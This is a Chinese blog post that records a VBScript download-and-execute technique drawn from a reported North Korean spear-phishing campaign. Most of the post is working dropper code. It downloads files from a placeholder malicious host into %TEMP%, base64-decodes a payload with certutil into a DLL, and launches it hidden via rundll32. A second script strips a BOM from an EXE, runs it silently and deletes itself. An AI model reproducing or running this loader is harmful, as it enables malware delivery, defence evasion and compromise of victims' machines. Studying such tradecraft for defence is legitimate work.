利用VBS下载EXE文件手法记录
2024-08-24 22:02:25
1、信息来源
疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理
https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ
https://twitter.com/blackorbird/status/1082553543280680962
2、利用思路
1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下,通过【powershell Invoke-item】运行。
2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll
4、 通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。
3、实例代码
下载代码:
Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "\note.png"
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile docPath, 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true
docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send
with bStrm2
.type = 1 '//binary
.open
.write xHttp2.responseBody
.savetofile dir + "\svchow.dat", 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true
转码运行exe:
Dim fIn, fOut, sFilename, sBOM
sFilename = "C:\windows\temp\xxx.exe"
Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename
sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
If AscB(MidB(sBOM, 1, 1)) = 255 _
And AscB(MidB(sBOM, 2, 1)) = 254 Then
fIn.Position = 2 ' Skip BOM
Set fOut = CreateObject("adodb.stream")
fOut.Type = 1 'adTypeBinary
fOut.Mode = adModeReadWrite
fOut.Open
fIn.CopyTo fOut
fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
fOut.Flush
fOut.Close
Set shell = CreateObject("Wscript.Shell")
shell.Run "c:\windows\temp\xxx.exe",0,False
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(WScript.ScriptName)
End If
最新文章
- Github代理设置
- 如何使用Charles抓包-- 入门篇
- BZOJ 1100: [POI2007]对称轴osi
- Linux crontab 定时任务命令详解
- 如何评价微软Connect 2015?[转载]
- oracle 日志学习(转载)
- nutch2.2.1
- perl5 附录一 函数集(未定稿)
- 编译kernel:内核makefile的作用
- 【读书札记】建立第一个Web项目
- LeetCode-Best Time to Buy and Sell Stock III[dp]
- Raspberry Pi中可用的Go IDE:liteide
- 虚拟机中使用centos7搭建ftp服务器
- JAVA-HashMap实现原理
- UI组件--element-ui--Table组件自定义合计行
- Vc数据库编程基础MySql数据库的表增删改查数据
- H5页面input输入框含有键盘自带的表情符时显示异常
- 20165225《Java程序设计》第六周学习总结
- echarts3 使用总结
- STM32 串口中断总结